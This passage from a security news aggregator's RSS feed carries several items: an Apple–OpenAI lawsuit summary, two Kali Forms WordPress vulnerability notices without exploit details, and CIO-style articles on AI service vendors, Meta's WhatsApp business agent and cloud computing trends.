Apple further claims that a former iPhone engineer who joined OpenAI earlier this year accessed internal systems and copied engineering presentations along with other confidential materials before leaving the company. The lawsuit describes OpenAI's hardware division as being "rotten to its core" and argues that the company built its hardware efforts using Apple's proprietary information.



The lawsuit remains in its early stages, and neither Apple's allegations nor OpenAI's defense have been tested in court. More developments are expected as the legal proceedings continue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11579 | Kali Forms Plugin up to 2.4.16 on WordPress file-upload unrestricted upload (EUVD-2026-44592)]]></title>
<description><![CDATA[A vulnerability was found in Kali Forms Plugin up to 2.4.16 on WordPress. It has been declared as critical. This issue affects some unknown processing. Such manipulation of the argument file-upload leads to unrestricted upload.

This vulnerability is documented as CVE-2026-11579. The attack can b...]]></description>
<link>https://tsecurity.de/de/3669842/sicherheitsluecken/cve-2026-11579-kali-forms-plugin-up-to-2416-on-wordpress-file-upload-unrestricted-upload-euvd-2026-44592/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669842/sicherheitsluecken/cve-2026-11579-kali-forms-plugin-up-to-2416-on-wordpress-file-upload-unrestricted-upload-euvd-2026-44592/</guid>
<pubDate>Wed, 15 Jul 2026 09:09:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/kali_forms_plugin">Kali Forms Plugin up to 2.4.16</a> on WordPress. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing. Such manipulation of the argument <em>file-upload</em> leads to unrestricted upload.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-11579">CVE-2026-11579</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11580 | Kali Forms Plugin up to 2.4.16 on WordPress AJAX Action authorization (EUVD-2026-44593)]]></title>
<description><![CDATA[A vulnerability was found in Kali Forms Plugin up to 2.4.16 on WordPress. It has been rated as problematic. Impacted is an unknown function of the component AJAX Action. Performing a manipulation results in authorization bypass.

This vulnerability is reported as CVE-2026-11580. The attack is pos...]]></description>
<link>https://tsecurity.de/de/3669841/sicherheitsluecken/cve-2026-11580-kali-forms-plugin-up-to-2416-on-wordpress-ajax-action-authorization-euvd-2026-44593/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669841/sicherheitsluecken/cve-2026-11580-kali-forms-plugin-up-to-2416-on-wordpress-ajax-action-authorization-euvd-2026-44593/</guid>
<pubDate>Wed, 15 Jul 2026 09:09:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/kali_forms_plugin">Kali Forms Plugin up to 2.4.16</a> on WordPress. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function of the component <em>AJAX Action</em>. Performing a manipulation results in authorization bypass.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-11580">CVE-2026-11580</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS, Azure and Google Cloud Are Now Under Direct UK Oversight]]></title>
<description><![CDATA[For years, the uncomfortable truth sitting underneath the UK's financial system has been this: a handful of cloud providers quietly underpin almost everything. Your bank, your insurer, your payment processor. Scratch beneath the surface and you'll find the same two or three names running the infr...]]></description>
<link>https://tsecurity.de/de/3669801/it-security-nachrichten/aws-azure-and-google-cloud-are-now-under-direct-uk-oversight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669801/it-security-nachrichten/aws-azure-and-google-cloud-are-now-under-direct-uk-oversight/</guid>
<pubDate>Wed, 15 Jul 2026 08:52:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/aws-azure-and-google-cloud-are-now-under-direct-uk-oversight" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/Boardroom_Discussion_on_Third_Party_Regulation_with_bgc.webp" alt="UK's Critical Third Parties Regime" class="hs-featured-image"> </a> 
</div> 
<p>For years, the uncomfortable truth sitting underneath the UK's financial system has been this: a handful of cloud providers quietly underpin almost everything. Your bank, your insurer, your payment processor. Scratch beneath the surface and you'll find the same two or three names running the infrastructure. When one of them stumbles, the tremor is felt everywhere. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your service vendors are being rebuilt around AI]]></title>
<description><![CDATA[Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create ...]]></description>
<link>https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667858/it-nachrichten/your-service-vendors-are-being-rebuilt-around-ai/</guid>
<pubDate>Tue, 14 Jul 2026 14:02:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Venture-backed firms are buying up the support, finance-ops and managed-services providers enterprises rely on and re-platforming them around AI agents — and the renewal that follows arrives priced per outcome, sold as your advantage. The acquisition-built structure and unproven stability create governance and continuity risks your vendor process isn’t sized for. Here’s how to keep the leverage on your side of the table.</p>



<p class="wp-block-paragraph">The first time an AI-native services pitch crossed my desk, I nearly signed it. The savings were real, the agents demoed cleanly and the pricing was the kind procurement loves — per resolved case, not per seat. What I almost missed was who got to define the word “resolved.” On an earlier outsourced-support arrangement, back in my public-sector days, the vendor’s reported resolution rate looked excellent right up until we pulled the reopen numbers ourselves. Auto-closed tickets had been counted as wins. Users had quietly stopped logging issues at all. The dashboard was green; the service was not.</p>



<p class="wp-block-paragraph">That gap — between the number on the contract and what your users actually live with — is the whole game now, and it is about to scale across your portfolio. <a href="https://www.gartner.com/en/articles/hype-cycle-for-agentic-ai">Gartner’s 2026 CIO and Technology Executive Survey found only 17% of organizations have deployed AI agents, but more than 60% expect to within two years</a> — the steepest adoption curve of any emerging technology it tracks. The providers running your services are moving first, and the contracts are changing faster than most of us can govern them.</p>



<p class="wp-block-paragraph">The agents underneath these pitches are also nowhere near as reliable in production as they look in the room. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expects more than 40% of agentic AI projects to be canceled by the end of 2027</a> on cost, unclear value and weak risk controls, and reckons only about 130 of the thousands of self-described agentic vendors are the real thing — the rest are “agent washing” old chatbots and RPA. Treat any headline resolution rate the way you treat a vendor’s own uptime stats: Marketing, until you have seen it run on accounts like yours.</p>



<h2 class="wp-block-heading">What’s behind the pitch</h2>



<p class="wp-block-paragraph">The challenger’s economics aren’t magic. They come from a reshaping of the services market: Venture-backed firms buying up fragmented, labor-heavy providers — support desks, contact centers, AP and finance ops, slices of managed IT — and re-platforming them around agents. Many of the companies pitching you are not one company at all but several acquired shops stitched onto a shared AI layer. That barely comes up in the sales meeting. It matters enormously once you are the customer.</p>



<p class="wp-block-paragraph">The direction is independently corroborated, not vendor hype. <a href="https://www.everestgrp.com/blogs/outcome-based-metrics-the-new-value-currency-in-bpo/">Everest Group reports outcome-based pricing in business-process services moving from pilots to scaled adoption</a> as AI makes outcomes measurable enough to contract on, with the binding constraint now governance and verified baselines. <a href="https://www.ey.com/content/dam/ey-unified-site/ey-com/en-gl/about-us/analyst-relations/documents/ey-gl-hfs-horizons-agentic-services-2026-ey-excerpt-04-2026.pdf">HFS Research tracks the same “services-to-software” shift</a> across consulting, IT, and operations providers. Here is the part worth holding onto: Most enterprises are early, so you have a little time. But the first vendors to reprice you this way will be the small, single-source ones in the long tail of your portfolio — which, if your stack looks anything like mine, is most of it.</p>



<h2 class="wp-block-heading">Don’t assume the incumbent is the safe choice</h2>



<p class="wp-block-paragraph">And don’t kid yourself that renewing with the familiar name keeps you clear of this. The big integrators are pulling labor out of their own delivery just as fast — <a href="https://news.outsourceaccelerator.com/it-services-firms-add-thousands/">Accenture cut tens of thousands of roles and rehired against an AI-skills filter</a> — and rewriting deals around a share of savings instead of time and materials. Outcome pricing is becoming the default everywhere. There is no version of this where you sit it out.</p>



<h2 class="wp-block-heading">Two risks your vendor process won’t catch</h2>



<p class="wp-block-paragraph">The first is governance, and the roll-up structure makes it worse than the usual AI-vendor worry. The company you are contracting with isn’t one system. It is several acquired firms with different data practices and security postures, with an AI layer dropped on top at speed. Your customer records, invoices and support transcripts flow into agents whose decisions you often can’t trace, across entities that were never built to one standard. The numbers here aren’t comforting: <a href="https://www.ibm.com/reports/data-breach">IBM’s 2025 Cost of a Data Breach Report found 63% of breached organizations had no AI governance policy at all, and 97% of those that suffered an AI-related breach lacked basic AI access controls</a> — AI adoption, IBM concluded, is outpacing both security and governance. When an agent botches a dispute or misroutes regulated data, the regulator and the customer come looking for you, not the platform. And here is the organizational trap: The savings line is what your CFO signs; the provenance question is the one your audit committee won’t ask until after the incident. Nobody raises it for you.</p>



<p class="wp-block-paragraph">The second is whether the provider will still be standing in three years. These platforms are new, built by acquisition, venture-funded and not one has run through a full contract term or a real downturn. With <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">Gartner expecting more than 40% of agentic AI projects to be canceled by 2027</a>, putting core operations on a young, agent-dependent vendor is a single point of failure dressed up as innovation. Write the exit and data-portability terms before you sign — while you still have leverage to.</p>



<h2 class="wp-block-heading">Six questions for the renewal</h2>



<p class="wp-block-paragraph">When the challenger shows up — or your incumbent reprices to match — these are the questions I would put on the table. They come down to one thing: Making sure you, not the vendor, own the number.</p>



<ol start="1" class="wp-block-list">
<li><strong>Definition, baseline, guardrails. </strong>Make “resolved” mean what your users experience, measured against a baseline you have captured yourself, and tie it to metrics you own — first-contact resolution, reopen rate, time-to-resolution. Expect procurement to resist because pinning this down slows the deal. Hold the line; it is the whole ballgame.</li>



<li><strong>Real agent, or agent washing. </strong>Gartner reckons only a sliver of self-described agentic vendors are the genuine article. Make them prove it: Production resolution on accounts like yours, and the human-escalation rate sitting behind that number. Not a demo.</li>



<li><strong>Auditability, as a gate. </strong>SOC 2 at minimum, increasingly ISO 42001 or NIST AI RMF alignment, plus model cards, decision logs and an incident-response plan they have actually tested. If they can’t show how data is walled off between their acquired entities, or how an agent’s decision gets traced, they aren’t ready for anything regulated. This belongs in the shortlist criteria, not the post-mortem.</li>



<li><strong>Where autonomy stops. </strong>Decide which actions an agent can take alone and which need a human, how it hands off with context and who is accountable when it acts on its own. Put names against it before go-live.</li>



<li><strong>The exit. </strong>An embedded agent platform gets stickier than the staffed incumbent it replaced, faster than you would think. Lock down data portability, knowledge-base ownership and a way out while you are still the one with leverage.</li>



<li><strong>Capacity, not just cost. </strong>The best outcome here often isn’t a smaller bill. It is the demand that your old service levels were quietly turning away. Nobody answered the tickets. The cases that aged out. Ask what fixing that is worth before you optimize purely for headcount.</li>
</ol>



<h2 class="wp-block-heading">The move</h2>



<p class="wp-block-paragraph">Outcome pricing is where this lands, and on balance, that is progress. But in the near term, it hands the advantage to whoever can measure the outcome — and in most shops, that isn’t the buyer. The edge isn’t picking the cleverest challenger or the safest incumbent. It is being able to hold any of them to a result, on your numbers. Look again at why Gartner thinks so many of these projects die: Not the technology — cost, fuzzy value, weak controls. Our side of the table. So, start there. Take one high-volume, measurable workflow, pilot it against a baseline you own, instrument it with your own metrics, and treat the muscle you build doing that as the real deliverable. Get it right and the pricing model stops mattering. Skip it, and you have just agreed to pay for someone else’s definition of done.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA['AI writing is now a problem everywhere on social media': Study finds nearly half of all LinkedIn long posts are AI-generated, and that's only the start]]></title>
<description><![CDATA[Online networks are drowning in AI-written slop, report finds - with LinkedIn the worst hit.]]></description>
<link>https://tsecurity.de/de/3667560/it-nachrichten/ai-writing-is-now-a-problem-everywhere-on-social-media-study-finds-nearly-half-of-all-linkedin-long-posts-are-ai-generated-and-thats-only-the-start/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667560/it-nachrichten/ai-writing-is-now-a-problem-everywhere-on-social-media-study-finds-nearly-half-of-all-linkedin-long-posts-are-ai-generated-and-thats-only-the-start/</guid>
<pubDate>Tue, 14 Jul 2026 12:20:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Online networks are drowning in AI-written slop, report finds - with LinkedIn the worst hit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Where Meta’s WhatsApp agent can actually win]]></title>
<description><![CDATA[Message a business on WhatsApp this week and you may be greeted by software. On June 3, Meta made its Business AI agent available to companies everywhere, a bot that answers questions, recommends products, books appointments, qualifies sales leads and hands you to a human when it gets stuck. It c...]]></description>
<link>https://tsecurity.de/de/3667537/it-security-nachrichten/where-metas-whatsapp-agent-can-actually-win/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667537/it-security-nachrichten/where-metas-whatsapp-agent-can-actually-win/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Message a business on WhatsApp this week and you may be greeted by software. On June 3, <a href="https://about.fb.com/news/2026/06/meta-business-agent/?utm_source=chatgpt.com">Meta made its Business AI agent available to companies everywhere</a>, a bot that answers questions, recommends products, books appointments, qualifies sales leads and hands you to a human when it gets stuck. It comes bundled in WhatsApp’s premium business tiers, and the largest companies pay for it by the token. After almost two years of testing in markets like India and Mexico, it is now live worldwide.</p>



<p class="wp-block-paragraph">I build AI agents for a living, and this is a good one. It also sits on top of the largest messaging network ever built. WhatsApp passed three billion monthly users last year. Mark Zuckerberg says people now hold more than a billion threads a day with business accounts across Meta’s apps. Paid messaging on WhatsApp crossed a <a href="https://techcrunch.com/2025/05/01/whatsapp-now-has-more-than-3-billion-users/?utm_source=chatgpt.com">two-billion-dollar annual run rate in the fourth quarter of 2025</a>, and click-to-WhatsApp ad revenue grew sixty percent year over year. Meta has spent a decade trying to turn all of that talking into buying, and the agent is its most capable attempt yet.</p>



<p class="wp-block-paragraph">So, picture the moment the agent finishes taking your order. What happens next?</p>



<h2 class="wp-block-heading"><a></a>The model Meta keeps pointing at</h2>



<p class="wp-block-paragraph">In Hangzhou or Shenzhen, the answer is that your order shows up, often within the hour. China fused messaging, payments and shopping into single apps more than a decade ago. WeChat carries roughly 1.4 billion users, an in-app store layer with hundreds of millions of monthly shoppers, and a wallet most of the country pays with. Korea built its own version, where KakaoTalk made chat the default way to send a gift. This is the world Meta gestures at when it imagines what WhatsApp could be.</p>



<p class="wp-block-paragraph">And yet WeChat, the purest “messaging app does commerce” story, is not actually China’s shopping champion, even though it arrived first and is still the bigger app. People do not open a messaging app to browse and shop. The buying went instead to Douyin, the Chinese app run by TikTok’s owner ByteDance, whose endless video feed is engineered to make you want things you were not looking for. WeChat had the users and the wallet, and it still lacked the two things that actually move commerce: A feed that creates demand and a way to deliver the goods. A chat window is neither.</p>



<h2 class="wp-block-heading"><a></a>The moat was never the storefront</h2>



<p class="wp-block-paragraph">Amazon learned the same lesson from the other side. Its moat was never the website. It was the warehouses, the trucks and the two-day promise (then one-day, then same-day) that rivals could not match. In 2025 <a href="https://www.freightwaves.com/news/amazon-overtakes-us-postal-service-as-largest-parcel-carrier?utm_source=chatgpt.com">Amazon passed the US Postal Service to become the largest parcel carrier in the country by volume, moving 6.7 billion packages</a>. Roughly 180 million Americans pay for Prime. The storefront is the part everyone sees; the fulfillment network is the part that wins.</p>



<p class="wp-block-paragraph">Asia’s commerce leaders made the same bet. Coupang built Korea’s Amazon by pouring billions into logistics: Order by midnight, and it arrives before 7 a.m., weekends included. Seven in ten Koreans now live within ten minutes of a Coupang warehouse. Even Alibaba, which grew up as an asset-light marketplace that owned no trucks, eventually concluded it had to build a logistics arm to keep pace.</p>



<p class="wp-block-paragraph">Speed sells, too. In China, McKinsey found, live shopping converts viewers into buyers at rates approaching 30 percent, roughly ten times an ordinary web page, because the fulfillment behind it delivers the impulse before it cools. The conversation creates the want, but the warehouse turns it into a sale.</p>



<h2 class="wp-block-heading"><a></a>Even where messaging rules</h2>



<p class="wp-block-paragraph">Korea shows what a messenger can and cannot win. KakaoTalk is the country’s WhatsApp, and it owns one kind of commerce completely: gifting. Koreans send presents straight from the chat window, close to 200 million of them in 2025, which is nearly all of the country’s mobile gifting. But notice what kind of commerce that is. A gift voucher or a coffee coupon needs no warehouse. The moment a purchase becomes a physical thing that has to arrive fast, the winner is no longer the messenger but Coupang and its dawn-delivery network. KakaoTalk owns the commerce that fits inside a message; Coupang owns the commerce that needs a truck.</p>



<p class="wp-block-paragraph">Japan makes the same point in the negative. LINE is about as dominant a messenger as exists anywhere, reaching 97 million people, close to 78 percent of the country. If messaging reach alone turned into commerce, LINE would own Japanese retail. Instead, it shut down its own payments service in 2025 and handed the wallet to a rival, while the actual shopping stayed with Rakuten and Amazon Japan. The most-used chat app in the country could not turn that reach into owning what people buy.</p>



<p class="wp-block-paragraph">Every market tells the same story: A chat app does not win physical commerce. Whoever owns the warehouse does.</p>



<h2 class="wp-block-heading"><a></a>What Meta is missing</h2>



<p class="wp-block-paragraph">Which brings us back to the WhatsApp agent, where Meta starts further ahead than WeChat ever did. Through Instagram and Reels it owns the demand-making feed WeChat never had, the agent gives it the sales conversation, and in the West, paying by card is universal. Only the last pillar is missing. Meta has no warehouses, no trucks, no delivery promise of its own and the few times it reached for the pieces around the sale, it pulled back: Its own wallet, Meta Pay, never became something people use, and in 2025 it wound down in-app checkout for Facebook and Instagram Shops, sending buyers back to merchants’ own sites to pay, ship and handle returns. Even Marketplace, its billion-user listings surface, mostly stays out of the transaction itself.</p>



<p class="wp-block-paragraph">And in the West, that last pillar is already spoken for. The West did fuse commerce, just not around chat. Amazon long ago combined the storefront, the payment, its own branded credit cards and the expensive part, the warehouses and the trucks, into one app that owns the American purchase from search to doorstep. That is the same kind of vertical integration China’s commerce giants built, with players like Alibaba and JD racing into a market where no Amazon yet stood in the way. In the US, that lane was filled years ago.</p>



<h2 class="wp-block-heading"><a></a>The other half</h2>



<p class="wp-block-paragraph">None of this makes the agent a mistake. It is already a booming ad business for Meta, and maybe that is all Meta wants it to be: Commerce’s front door, sending the shopper onward and billing the merchant for the introduction.</p>



<p class="wp-block-paragraph">But goods are only half of commerce, and the other half never needed a warehouse. Remember what KakaoTalk won: Gifting, the one kind of buying that ships nothing. Services are the same, only far bigger. A haircut, a dental cleaning, a training session, a plumber’s visit, a tutor’s hour: None of it sits in a fulfillment center. The transaction is a booking, not a box.</p>



<p class="wp-block-paragraph">And a booking is exactly what the agent is built to take. Look at the feature Meta put in its own announcement, right beside answering questions and recommending products: It books appointments. For a salon, a clinic or a one-person studio, that is a front desk. Give it the two pieces still missing, a calendar to hold the schedule and a way to take payment inside the chat, and WhatsApp stops being where those businesses message customers and becomes where they run the day.</p>



<p class="wp-block-paragraph">None of it needs a warehouse, and none of it is Amazon’s to defend. Does that put Meta on a collision course with Square and Mindbody?</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[EZB: Diese Hürden muss der digitale Euro noch nehmen - Golem.de]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali ... – Zertifikatskurs TeleTrusT Information Security Professional: virtueller Fünf-Tage-Workshop.]]></description>
<link>https://tsecurity.de/de/3667233/it-security-nachrichten/ezb-diese-huerden-muss-der-digitale-euro-noch-nehmen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667233/it-security-nachrichten/ezb-diese-huerden-muss-der-digitale-euro-noch-nehmen-golemde/</guid>
<pubDate>Tue, 14 Jul 2026 09:52:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali ... – Zertifikatskurs TeleTrusT Information <b>Security</b> Professional: virtueller Fünf-Tage-Workshop.]]></content:encoded>
</item>
<item>
<title><![CDATA[What is cloud computing? From infrastructure to autonomous, agentic-driven ecosystems]]></title>
<description><![CDATA[Cloud computing continues to be the platform of choice for large applications and a driver of innovation in enterprise technology. Gartner forecasts public cloud spending alone to  the public cloud services market alone will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and...]]></description>
<link>https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h3 class="wp-block-heading"></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337750/when-will-cloud-computing-stop-growing.html">Cloud computing</a> continues to be the <a href="https://www.cio.com/article/482179/volkswagen-drives-the-automotive-industry-cloud-forward.html">platform of choice for large applications</a> and a <a href="https://www.infoworld.com/article/2336917/cloud-computing-is-reinventing-cars-and-trucks.html">driver of innovation</a> in enterprise technology. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-20-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-surpass-675-billion-in-2024#:~:text=Worldwide%20end-user%20spending%20on,(GenAI)%20and%20application%20modernization.">Gartner </a>forecasts public cloud spending alone to  the<a href="https://www.gartner.com/en/documents/6302015#:~:text=Summary,AI%20workloads%20and%20enterprise%20modernization."> public cloud services market alone </a>will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and enterprise modernization.</p>



<p class="wp-block-paragraph">Driving this growth are the rise of <a href="https://www.infoworld.com/article/2262333/youre-doing-cloud-based-ai-and-machine-learning-wrong.html">AI and machine learning on the cloud</a>, <a href="https://www.infoworld.com/article/2335144/what-happened-to-edge-computing.html">adoption of edge computing</a>, the maturation of <a href="https://www.infoworld.com/article/3406501/what-is-serverless-serverless-computing-explained.html">serverless computing</a>, the emergence of <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud strategies</a>, improved security and privacy, and more sustainable cloud practices.</p>



<h2 class="wp-block-heading">What is cloud computing?</h2>



<p class="wp-block-paragraph">While often used broadly, the term cloud computing is defined as an abstraction of compute, storage, and network infrastructure assembled as a platform on which applications and systems are deployed quickly and scaled on the fly.</p>



<p class="wp-block-paragraph">Most cloud customers consume <a href="https://www.cio.com/article/2097657/6-cloud-market-forces-impacting-it-strategies-today.html">public cloud </a>computing services over the internet, which are hosted in large, remote data centers maintained by cloud providers. The most common type of cloud computing, SaaS (software as service), delivers prebuilt applications to the browsers of customers who pay per seat or by usage, exemplified by such popular apps as Salesforce, Google Docs, or Microsoft Teams.</p>



<h3><strong> 5 top trends in cloud computing</strong></h3>

<ol>
<li><strong>Agentic cloud ecosystems: </strong> The shift from AI as a tool to AI as an autonomous operator within cloud environments.</li>
<li><strong>Sovereign and localized clouds: </strong> Meeting strict national data residency and digital sovereignty laws.</li>
<li><strong>Specialized AI hardware access: </strong> Navigating the GPU capacity crunch through reserved instances and boutique AI clouds.</li>
<li><strong>Integrated greenOps: </strong>Merging cost optimization with mandatory carbon-footprint reporting.</li>
<li><strong>Industry-specific walled gardens: </strong> The maturation of vertical clouds into highly regulated, precompliant environments for finance and healthcare.</li>
</ol>






<p class="wp-block-paragraph">Next in line is IaaS (infrastructure as a service), which offers vast, virtualized compute, storage, and network infrastructure upon which customers build their own applications, often with the aid of providers’ <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">API</a>-accessible services.</p>



<p class="wp-block-paragraph">When people refer to the “the cloud” today, they most often mean the big IaaS providers: AWS (Amazon Web Services), Google Cloud Platform, or Microsoft Azure. All three have become ecosystems of services that go way beyond infrastructure and include developer tools, serverless computing, machine learning services and APIs, data warehouses, and thousands of other services. With both SaaS and IaaS, a key benefit is agility. Customers gain new capabilities almost instantly without the capital investment in hardware or software on-premises — and they can instantly scale the cloud resources they consume up or down as needed.</p>



<p class="wp-block-paragraph">According to <a href="https://foundryco.com/research/cloud-computing/">Foundry’s Cloud Computing Study, 2025</a>, enterprises are moving to the cloud to improve security and/or governance, increase scalability​, accelerate adoption of artificial intelligence and machine learning and other new technologies, replace on-premises legacy technology, ​improve employee productivity, and ensure disaster recovery and business continuity.</p>



<h2 class="wp-block-heading">Hyperscalers now dominate cloud services</h2>



<p class="wp-block-paragraph">The largest cloud service providers are often described as hyperscalers, due to their capability to provide large-scale data centers across the globe. Hyperscalers typically offer a wide range of cloud services, including IaaS, PaaS, SaaS, and more.</p>



<p class="wp-block-paragraph">As mentioned above, notable hyperscalers include Amazon Web Services (AWS), Google Cloud Platform, and Microsoft Azure. They offer the following capabilities.</p>



<ul class="wp-block-list">
<li><strong>Scalability</strong>: Hyperscalers can handle massive workloads and scale resources up or down quickly.</li>



<li><strong>Cost-effectiveness</strong>: Hyperscalers often offer competitive pricing and economies of scale.</li>



<li><strong>Global reach</strong>: Hyperscalers operate data centers around the world, providing low-latency access to customers in different regions.</li>



<li><strong>Innovation</strong>: Hyperscalers are at the forefront of cloud innovation, offering new services and features.</li>
</ul>



<h3 class="wp-block-heading">Challenges of working with hyperscalers</h3>



<ul class="wp-block-list">
<li><strong>Vendor lock-in</strong>: Relying heavily on a single hyperscaler can create <a href="https://www.cio.com/article/648048/hyperscalers-in-crosshairs-for-anti-competitive-pricing-and-lock-in.html">vendor lock-in</a>, making it difficult to switch to another provider and charging large egress fees if you do move.</li>



<li><strong>Complexity</strong>: Hyperscalers offer a vast array of services, which can be overwhelming for some customers.</li>



<li><strong>Security concerns</strong>: Because hyperscalers handle sensitive data, security is a major concern.</li>
</ul>



<h2 class="wp-block-heading"><strong>AI, Agents, and the Sovereign Cloud</strong></h2>



<p class="wp-block-paragraph">The AI-enabled enterprise has moved beyond simple chatbots. The focus has shifted to <strong>agentic workflows </strong>— autonomous systems that reside in the cloud and possess the authority to execute business processes, manage cloud spend, and self-patch security vulnerabilities without human intervention.</p>



<h3 class="wp-block-heading"><strong>The shift to agentic infrastructure</strong></h3>



<p class="wp-block-paragraph">Cloud providers are no longer just selling compute. They are selling <strong>inference-as-a-service</strong>. Modern cloud budgets are now dominated by the high cost of specialized GPU clusters (such as Nvidia’s Blackwell architecture). This has led to the rise of boutique AI clouds that compete with hyperscalers by offering bare-metal access to the latest silicon specifically for model training and fine-tuning.</p>



<h3 class="wp-block-heading"><strong>Data sovereignty and private AI</strong></h3>



<p class="wp-block-paragraph">A major shift in late 2025 is the move away from public AI models for sensitive data. Organizations are increasingly using retrieval-augmented generation (RAG) within walled garden environments. This ensures that a company’s proprietary data never leaves their specific cloud instance to train a provider’s base model.</p>



<p class="wp-block-paragraph">Furthermore, sovereign AI has become a requirement for global operations. Governments now demand that the AI models processing their citizens’ data be hosted on infrastructure that is owned, operated, and governed within their own borders.</p>



<h3 class="wp-block-heading"><strong>The challenges of ghost AI</strong></h3>



<p class="wp-block-paragraph">Just as shadow IT plagued the 2010s, ghost AI—unauthorized AI agents running on corporate cloud accounts — has become a primary security risk. Managing these autonomous entities requires a new layer of <strong>AI governance</strong>, where the cloud provider automatically audits the intent and permissions of every running agent to prevent runaway costs or data leaks.</p>



<h2 class="wp-block-heading">Cloud computing definitions</h2>



<p class="wp-block-paragraph">In 2011, <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-145.pdf">NIST posted a PDF</a> that divided cloud computing into three “service models” — SaaS, IaaS, and PaaS (platform as a service) — the latter being a controlled environment within which customers develop and run applications. These three categories have largely stood the test of time, although most PaaS solutions now are made available as services within IaaS ecosystems rather than as dedicated PaaS clouds.</p>



<p class="wp-block-paragraph">Two evolutionary trends stand out since NIST’s threefold definition. One is the long and growing list of subcategories within SaaS, IaaS, and PaaS, some of which blur the lines between categories. The other is the explosion of API-accessible services available in the cloud, particularly within IaaS ecosystems. The cloud has become a crucible of innovation where many emerging technologies appear first as services, a big attraction for business customers who understand the potential competitive advantages of early adoption.</p>



<h3 class="wp-block-heading"><strong>SaaS (software as a service) definition</strong></h3>



